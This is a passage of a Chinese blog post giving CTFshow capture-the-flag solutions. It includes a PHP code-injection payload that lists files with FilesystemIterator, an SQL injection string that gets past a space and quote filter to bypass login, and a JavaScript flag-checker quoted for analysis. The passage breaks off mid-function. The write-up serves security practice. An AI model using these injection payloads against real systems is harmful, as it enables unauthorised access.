<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png?v=2.6.2" sizes="180x180"><link rel="mask-icon" href="/images/icons/stun-logo.svg?v=2.6.2" color="#54bcff"><meta name="msapplication-TileImage" content="/images/icons/favicon-144x144.png"><meta name="msapplication-TileColor" content="#000000"><meta name="baidu-site-verification" content="code-15zD58SrOe"><meta name="description" content="680 post传入code&#x3D;phpinfo();执行成功，查看被ban函数，无法执行命令，使用原生类查看文件 1code&#x3D;$a&#x3D;new FilesystemIterator(&quot;.&quot;);var_dump ($a);   下载文件即可 681 抓包发现返回内容为sql语句  过滤了空格和引号，会被吞，尝试构造payload，发现#可用，\可用，构造语句||1#\此时执行语句为 1">
<meta property="og:type" content="article">
<meta property="og:title" content="CTFshow大赛原题">
<meta property="og:url" content="http://jlan.darkflow.top/posts/76fe6b8e.html">
<meta property="og:site_name" content="Jlan&#39;s Little World">
<meta property="og:description" content="680 post传入code&#x3D;phpinfo();执行成功，查看被ban函数，无法执行命令，使用原生类查看文件 1code&#x3D;$a&#x3D;new FilesystemIterator(&quot;.&quot;);var_dump ($a);   下载文件即可 681 抓包发现返回内容为sql语句  过滤了空格和引号，会被吞，尝试构造payload，发现#可用，\可用，构造语句||1#\此时执行语句为 1">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202206090028188.png">
<meta property="og:image" content="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202206090039242.png">
<meta property="article:published_time" content="2022-06-08T16:26:01.000Z">
<meta property="article:modified_time" content="2022-06-10T11:44:17.499Z">
<meta property="article:author" content="Jlan">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202206090028188.png"><title>CTFshow大赛原题 | Jlan's Little World</title><link ref="canonical" href="http://jlan.darkflow.top/posts/76fe6b8e.html"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":true},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"carbon","highlight":"dark","wordWrap":true},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: {"avoidBanner":false},
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.0.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/links/"><span class="header-nav-menu-item__icon"><i class="fas fa-user-friends"></i></span><span class="header-nav-menu-item__text">友链</span></a></div></div><div class="header-nav-search"><span class="header-nav-search__icon"><i class="fas fa-search"></i></span><span class="header-nav-search__text">搜索</span></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Jlan's Little World</div><div class="header-banner-info__subtitle">欢迎来学习知识</div></div><div class="header-banner-arrow"><div class="header-banner-arrow__icon"><i class="fas fa-angle-down"></i></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">CTFshow大赛原题</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2022-06-09</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2022-06-10</span></span><span class="post-meta-item post-meta-item--visitors leancloud_visitors" id="/posts/76fe6b8e.html" data-flag-title="CTFshow大赛原题"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">阅读次数</span><span class="post-meta-item__value leancloud-visitors-count"></span></span><span class="post-meta-item post-meta-item--visitors"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">阅读次数</span><span class="post-meta-item__value" id="busuanzi_value_page_pv"></span></span></div></header><div class="post-body"><p><strong>680</strong></p>
<p>post传入<code>code=phpinfo();</code>执行成功，查看被ban函数，无法执行命令，使用原生类查看文件</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=$a=new FilesystemIterator(&quot;.&quot;);var_dump ($a);</span><br></pre></td></tr></table></div></figure>

<p><img src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202206090028188.png"></p>
<p>下载文件即可</p>
<p><strong>681</strong></p>
<p>抓包发现返回内容为sql语句</p>
<p><img src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202206090039242.png"></p>
<p>过滤了空格和引号，会被吞，尝试构造payload，发现#可用，\可用，构造语句<code>||1#\</code>此时执行语句为</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>) <span class="keyword">from</span> ctfshow_users <span class="keyword">where</span> username <span class="operator">=</span> <span class="string">&#x27;||1#\&#x27;</span> <span class="keyword">or</span> nickname <span class="operator">=</span> <span class="string">&#x27;||1#\&#x27;</span></span><br></pre></td></tr></table></div></figure>

<p>相当于判断username是否等于<code>||1&#39; or nickname = </code>这一字符串或一，结果永真，登录即可拿到flag</p>
<p><strong>682</strong></p>
<p>这辈子第一次碰到js代码审计，看呗</p>
<figure class="highlight javascript"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> c2n  = <span class="function"><span class="params">c</span> =&gt;</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(c.length&gt;<span class="number">1</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(c.charCodeAt()&gt;<span class="number">0x60</span> &amp;&amp; c.charCodeAt()&lt;<span class="number">0x67</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> c.charCodeAt()-<span class="number">0x57</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">parseInt</span>(c)&gt;<span class="number">0</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">parseInt</span>(c)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> s2n2su = <span class="function"><span class="params">s</span> =&gt;</span>&#123;</span><br><span class="line">    r=<span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">var</span> i = s.length - <span class="number">1</span>; i &gt;= <span class="number">0</span>; i--) &#123;</span><br><span class="line">        r+=c2n(s[i])</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> r</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">test</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">var</span> m=<span class="built_in">document</span>.getElementById(<span class="string">&quot;message&quot;</span>).value;</span><br><span class="line">    <span class="keyword">var</span> e = <span class="string">&#x27;error&#x27;</span>;</span><br><span class="line">    <span class="keyword">if</span>(sha256(m)!==<span class="string">&quot;e3a331710b01ff3b3e34d5f61c2c9e1393ccba3e31f814e7debd537c97ed7d3d&quot;</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">var</span> start = m.substring(<span class="number">0</span>,<span class="number">8</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(start!==<span class="string">&#x27;ctfshow&#123;&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(m.substring(m.length,m.length-<span class="number">1</span>)!==<span class="string">&quot;&#125;&quot;</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">var</span> s = m.substring(<span class="number">8</span>,m.length-<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">if</span>(s.length!==<span class="number">36</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">var</span> k = s.split(<span class="string">&quot;-&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span>(k.length!==<span class="number">5</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(s2n2su(k[<span class="number">0</span>])!==<span class="number">63</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(sha256(k[<span class="number">0</span>].substr(<span class="number">0</span>,<span class="number">4</span>))!==<span class="string">&quot;c578feba1c2e657dba129b4012ccf6a96f8e5f684e2ca358c36df13765da8400&quot;</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(sha256(k[<span class="number">0</span>].substr(<span class="number">4</span>,<span class="number">8</span>))!==<span class="string">&quot;f9c1c9536cc1f2524bc3eadc85b2bec7ff620bf0f227b73bcb96c1f278ba90dc&quot;</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">parseInt</span>(k[<span class="number">1</span>][<span class="number">0</span>])!==(c2n(<span class="string">&#x27;a&#x27;</span>)-<span class="number">1</span>))&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(k[<span class="number">1</span>][<span class="number">1</span>]+k[<span class="number">1</span>][<span class="number">2</span>]+k[<span class="number">1</span>][<span class="number">3</span>]!==<span class="string">&#x27;dda&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(k[<span class="number">2</span>][<span class="number">1</span>]!==<span class="string">&#x27;e&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(k[<span class="number">2</span>][<span class="number">0</span>]+k[<span class="number">2</span>][<span class="number">2</span>]+k[<span class="number">2</span>][<span class="number">3</span>]!=<span class="number">0x1ae</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">parseInt</span>(k[<span class="number">3</span>][<span class="number">0</span>])!==(c2n(<span class="string">&#x27;a&#x27;</span>)-<span class="number">1</span>))&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">parseInt</span>(k[<span class="number">3</span>][<span class="number">1</span>])!==<span class="built_in">parseInt</span>(k[<span class="number">3</span>][<span class="number">3</span>]))&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">parseInt</span>(k[<span class="number">3</span>][<span class="number">3</span>])*<span class="number">2</span>+c2n(<span class="string">&#x27;a&#x27;</span>)!==<span class="number">0x12</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(sha224(k[<span class="number">3</span>][<span class="number">2</span>])!==<span class="string">&#x27;abd37534c7d9a2efb9465de931cd7055ffdb8879563ae98078d6d6d5&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(st3(k[<span class="number">4</span>])!==<span class="string">&#x27;GVSTMNDGGQ2DSOLBGUZA====&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> alert(e)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    alert(<span class="string">&#x27;you are right&#x27;</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> Base64 = &#123;</span><br><span class="line">    <span class="attr">_keyStr</span>: <span class="string">&quot;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=&quot;</span>,</span><br><span class="line">    <span class="attr">encode</span>: <span class="function"><span class="keyword">function</span> (<span class="params">e</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> t = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="keyword">var</span> n, r, i, s, o, u, a;</span><br><span class="line">        <span class="keyword">var</span> f = <span class="number">0</span>;</span><br><span class="line">        e = Base64._utf8_encode(e);</span><br><span class="line">        <span class="keyword">while</span> (f &lt; e.length) &#123;</span><br><span class="line">            n = e.charCodeAt(f++);</span><br><span class="line">            r = e.charCodeAt(f++);</span><br><span class="line">            i = e.charCodeAt(f++);</span><br><span class="line">            s = n &gt;&gt; <span class="number">2</span>;</span><br><span class="line">            o = (n &amp; <span class="number">3</span>) &lt;&lt; <span class="number">4</span> | r &gt;&gt; <span class="number">4</span>;</span><br><span class="line">            u = (r &amp; <span class="number">15</span>) &lt;&lt; <span class="number">2</span> | i &gt;&gt; <span class="number">6</span>;</span><br><span class="line">            a = i &amp; <span class="number">63</span>;</span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">isNaN</span>(r)) &#123;</span><br><span class="line">                u = a = <span class="number">64</span></span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">isNaN</span>(i)) &#123;</span><br><span class="line">                a = <span class="number">64</span></span><br><span class="line">            &#125;</span><br><span class="line">            t = t + <span class="built_in">this</span>._keyStr.charAt(s) + <span class="built_in">this</span>._keyStr.charAt(o) + <span class="built_in">this</span>._keyStr.charAt(u) + <span class="built_in">this</span>._keyStr.charAt(a)</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> t</span><br><span class="line">    &#125;,</span><br><span class="line">    <span class="attr">decode</span>: <span class="function"><span class="keyword">function</span> (<span class="params">e</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> t = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="keyword">var</span> n, r, i;</span><br><span class="line">        <span class="keyword">var</span> s, o, u, a;</span><br><span class="line">        <span class="keyword">var</span> f = <span class="number">0</span>;</span><br><span class="line">        e = e.replace(<span class="regexp">/[^A-Za-z0-9+/=]/g</span>, <span class="string">&quot;&quot;</span>);</span><br><span class="line">        <span class="keyword">while</span> (f &lt; e.length) &#123;</span><br><span class="line">            s = <span class="built_in">this</span>._keyStr.indexOf(e.charAt(f++));</span><br><span class="line">            o = <span class="built_in">this</span>._keyStr.indexOf(e.charAt(f++));</span><br><span class="line">            u = <span class="built_in">this</span>._keyStr.indexOf(e.charAt(f++));</span><br><span class="line">            a = <span class="built_in">this</span>._keyStr.indexOf(e.charAt(f++));</span><br><span class="line">            n = s &lt;&lt; <span class="number">2</span> | o &gt;&gt; <span class="number">4</span>;</span><br><span class="line">            r = (o &amp; <span class="number">15</span>) &lt;&lt; <span class="number">4</span> | u &gt;&gt; <span class="number">2</span>;</span><br><span class="line">            i = (u &amp; <span class="number">3</span>) &lt;&lt; <span class="number">6</span> | a;</span><br><span class="line">            t = t + <span class="built_in">String</span>.fromCharCode(n);</span><br><span class="line">            <span class="keyword">if</span> (u != <span class="number">64</span>) &#123;</span><br><span class="line">                t = t + <span class="built_in">String</span>.fromCharCode(r)</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (a != <span class="number">64</span>) &#123;</span><br><span class="line">                t = t + <span class="built_in">String</span>.fromCharCode(i)</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        t = Base64._utf8_decode(t);</span><br><span class="line">        <span class="keyword">return</span> t</span><br><span class="line">    &#125;,</span><br><span class="line">    <span class="attr">_utf8_encode</span>: <span class="function"><span class="keyword">function</span> (<span class="params">e</span>) </span>&#123;</span><br><span class="line">        e = e.replace(<span class="regexp">/rn/g</span>, <span class="string">&quot;n&quot;</span>);</span><br><span class="line">        <span class="keyword">var</span> t = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="keyword">for</span> (<span class="keyword">var</span> n = <span class="number">0</span>; n &lt; e.length; n++) &#123;</span><br><span class="line">            <span class="keyword">var</span> r = e.charCodeAt(n);</span><br><span class="line">            <span class="keyword">if</span> (r &lt; <span class="number">128</span>) &#123;</span><br><span class="line">                t += <span class="built_in">String</span>.fromCharCode(r)</span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">if</span> (r &gt; <span class="number">127</span> &amp;&amp; r &lt; <span class="number">2048</span>) &#123;</span><br><span class="line">                t += <span class="built_in">String</span>.fromCharCode(r &gt;&gt; <span class="number">6</span> | <span class="number">192</span>);</span><br><span class="line">                t += <span class="built_in">String</span>.fromCharCode(r &amp; <span class="number">63</span> | <span class="number">128</span>)</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                t += <span class="built_in">String</span>.fromCharCode(r &gt;&gt; <span class="number">12</span> | <span class="number">224</span>);</span><br><span class="line">                t += <span class="built_in">String</span>.fromCharCode(r &gt;&gt; <span class="number">6</span> &amp; <span class="number">63</span> | <span class="number">128</span>);</span><br><span class="line">                t += <span class="built_in">String</span>.fromCharCode(r &amp; <span class="number">63</span> | <span class="number">128</span>)</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> t</span><br><span class="line">    &#125;,</span><br><span class="line">    <span class="attr">_utf8_decode</span>: <span class="function"><span class="keyword">function</span> (<span class="params">e</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> t = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="keyword">var</span> n = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">var</span> r = c1 = c2 = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">while</span> (n &lt; e.length) &#123;</span><br><span class="line">            r = e.charCodeAt(n);</span><br><span class="line">            <span class="keyword">if</span> (r &lt; <span class="number">128</span>) &#123;</span><br><span class="line">                t += <span class="built_in">String</span>.fromCharCode(r);</span><br><span class="line">                n++</span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">if</span> (r &gt; <span class="number">191</span> &amp;&amp; r &lt; <span class="number">224</span>) &#123;</span><br><span class="line">                c2 = e.charCodeAt(n + <span class="number">1</span>);</span><br><span class="line">                t += <span class="built_in">String</span>.fromCharCode((r &amp; <span class="number">31</span>) &lt;&lt; <span class="number">6</span> | c2 &amp; <span class="number">63</span>);</span><br><span class="line">                n += <span class="number">2</span></span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                c2 = e.charCodeAt(n + <span class="number">1</span>);</span><br><span class="line">                c3 = e.charCodeAt(n + <span class="number">2</span>);</span><br><span class="line">                t += <span class="built_in">String</span>.fromCharCode((r &amp; <span class="number">15</span>) &lt;&lt; <span class="number">12</span> | (c2 &amp; <span class="number">63</span>) &lt;&lt; <span class="number">6</span> | c3 &amp; <span class="number">63</span>);</span><br><span class="line">                n += <span class="number">3</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> t</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">st3</span>(<span class="params">srcString</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (!srcString) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> BASE32CHAR = <span class="string">&quot;ABCDEFGHIJKLMNOPQRSTUVWXYZ234567&quot;</span>;</span><br><span class="line">    <span class="keyword">let</span> i = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">let</span> index = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">let</span> digit = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">let</span> currByte;</span><br><span class="line">    <span class="keyword">let</span> nextByte;</span><br><span class="line">    <span class="keyword">let</span> retrunString = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    srcString = Base64._utf8_encode(srcString);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; srcString.length;) &#123;</span><br><span class="line">        currByte = (srcString.charCodeAt(i) &gt;= <span class="number">0</span>) ? srcString.charCodeAt(i)</span><br><span class="line">            : (srcString.charCodeAt(i) + <span class="number">256</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (index &gt; <span class="number">3</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span> ((i + <span class="number">1</span>) &lt; srcString.length) &#123;</span><br><span class="line">                nextByte = (srcString.charCodeAt(i + <span class="number">1</span>) &gt;= <span class="number">0</span>)</span><br><span class="line">                    ? srcString.charCodeAt(i + <span class="number">1</span>)</span><br><span class="line">                    : (srcString.charCodeAt(i + <span class="number">1</span>) + <span class="number">256</span>);</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                nextByte = <span class="number">0</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            digit = currByte 